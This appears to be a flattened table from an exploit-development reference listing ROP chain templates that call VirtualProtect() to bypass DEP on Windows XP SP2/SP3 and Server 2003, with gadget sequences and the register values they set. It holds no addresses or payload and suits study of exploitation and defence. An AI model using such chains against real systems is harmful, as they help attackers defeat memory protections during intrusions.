WINDOWS XP SP2 WINDOWS XP SP3 POP EBP # RETN skip 4 bytes POP EBX # RETN 0x00000400-> ebx POP EDX # RETN 0x00000040-> edx POP ECX # RETN Writable location POP EDI # RETN RETN (ROP NOP) POP ESI # RETN JMP [EAX] POP EAX # RETN ptr to VirtualProtect() PUSHAD # RETN ptr to 'push esp # ret WINDOWS SERVER 2003 SP1 WINDOWS SERVER 2003 SP2 POP EAX # RETN ptr to VirtualProtect() MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN Filler XCHG EAX,ESI # RETN POP EBP # RETN PUSH ESP # RETN POP EBX # RETN 0x00000400-> ebx POP EDX # RETN 0x00000040-> edx POP ECX # RETN Writable location POP EDI # RETN RETN (ROP NOP) POP EAX # RETN nop PUSHAD # ADD AL,0EF # RETN